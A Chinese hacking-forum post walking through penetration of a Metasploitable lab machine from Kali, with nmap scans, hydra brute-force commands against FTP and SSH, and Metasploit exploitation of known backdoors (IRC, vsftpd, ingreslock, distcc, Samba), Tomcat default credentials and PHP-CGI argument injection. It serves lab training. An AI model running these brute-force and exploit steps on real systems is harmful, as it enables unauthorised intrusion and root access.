黑帽联盟

 找回密码
 会员注册
查看: 2239|回复: 0
打印 上一主题 下一主题

[系统安全] kali渗透metasploitable靶机

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    扫描阶段:
    工具:Nmap
    隐蔽扫描      nmap  -sS 192.168.8.135
    10.png


    端口爆破:FTP、SSH等
    工具:Hydra
    备用字典
    11.png


    • 爆破FTP

    hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135
    12.png


    • 爆破SSH

    hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh
    13.png

    登陆系统:
    14.png


    端口渗透:
    • 6667——-irc_3281_backdoor
    利用metasploit
    15.png

    成功获取会话,root权限
    16.png


    • 6200——-vsftpd_234_backdoor

    利用metasploit
    17.png

    反弹会话,root权限
    18.png

    • 1524——-ingrelock_backdoor
    利用telnet连接1524,直接返回root会话
    19.png


    • 1099——-distcc程序漏洞—-ingrelock

    利用metasploit
    20.png

    返回会话
    22.png


    • 139——-samba为3.0漏洞

    先用nmap进行详细扫描
    nmap -v -A -T4 192.168.8.135
    23.png


    Samba 3.0.20
    利用metasploit
    24.png

    25.png

    返回会话,root权限
    26.png


    • 8180——-Apache Tomcat弱口令
    27.png



    使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破
    用默认自带的字典即可
    28.png


    爆破出tomcat/tomcat
    使用use exploit/multi/http/tomcat_mgr_upload模块
    获取meterpreter会话
    29.png


    • 80——-PHP CGI参数注入执行漏洞
    30.png



    msf > search cve:2012-1823
    msf > use exploit/multi/http/php_cgi_arg_injection
    msf exploit(php_cgi_arg_injection) > show options
    msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135
    rhost => 192.168.8.135
    msf exploit(php_cgi_arg_injection) > run
    31.png



    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部